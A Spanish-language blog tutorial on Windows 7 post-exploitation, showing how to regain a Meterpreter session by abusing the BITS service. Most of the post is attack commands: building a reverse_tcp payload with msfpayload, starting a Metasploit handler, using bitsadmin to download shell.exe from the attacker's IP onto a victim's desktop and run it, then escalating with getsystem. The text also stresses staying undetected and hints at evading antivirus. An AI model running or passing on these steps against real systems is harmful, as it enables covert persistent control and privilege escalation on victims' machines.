Inicio > Manuales y tutoriales > Post Explotación de Windows 7 con BITSADMIN

Post Explotación de Windows 7 con BITSADMIN

bitsadmin_example

Durante la parte de post-explotación de un sistema operativo como Windows 7 , es muy importante poder preservar el control , para ello es necesario descargar y ejecutar nuestros shell reversos, y evidentemente tiene que pasar desapercibido.

Para esto en Windows 7 encontramos BITS “Servicio de transferencia inteligente en segundo plano de Microsoft”. Se utiliza para transferir archivos, entre otras cosas.

Planteemos este escenario:

Contamos con una consola de DOS en Windows 7 , obtenida de alguna forma, (con netcat por ejemplo) sin embargo una consola DOS, muchas veces es muy limitada, ya que necesitamos ejecutar comandos mas complejos, entonces nos ponemos a trabajar para tener nuevamente una sesión de Meterpreter, apoyándonos en BITS , de la siguiente forma:

En Kali Linux creamos un Payload con Metasploit donde la IP 10.10.88.236 es la IP de Kali

#msfpayload windows/meterpreter/reverse_tcp lhost=10.10.88.236 lport=1234 X > /var/www/shell.exe

Ahora abriremos el handler de Metasploit

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=10.10.88.236 lport=1234 E

En la consola de Windows que tenemos, descargaremos el shell.exe de la maquina Kali Linux

C:\Windows\system32> cd Users
C:\Windows\system32> cd ecornejo
C:\Windows\system32> cd Destktop

C:\Windows\system32> bitsadmin /create proceso1
C:\Windows\system32> bitsadmin /addfile proceso1 http://10.10.88.236/shell.exe  c:\Users\ecornejo\Desktop\shell.exe
C:\Windows\system32> bitsadmin /resume proceso1
C:\Windows\system32> bitsadmin /complete proceso1

Con esto realizado, tendremos nuestro shell.exe en el escritorio del usuario , ahora lo ejecutaremos

C:\Windows\system32> cd c:\Users\ecornejo\Desktop
C:\Windows\system32> shell.exe

Si todo salio bien tendremos una sesión de Meterpreter activa y lista para volver a tomar el control

meterpreter > getuid
meterpreter > getsystem

Nota: Es evidente que no es la única forma , también esta el hecho de que un antivirus puede detectar nuestro exe, sin embargo para eso también existen otros mecanismos , espero les sirva.

Referencias:
http://technet.microsoft.com/en-us/magazine/ff382721.aspx

http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx

Anuncio publicitario
Categorías: Manuales y tutoriales
  1. Alexis Morán
    septiembre 17, 2014 a las 4:51 am

    Excelente como siempre profesor Juan Oliva.

  1. No trackbacks yet.

Deja una respuesta

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Salir /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Salir /  Cambiar )

Conectando a %s

A %d blogueros les gusta esto: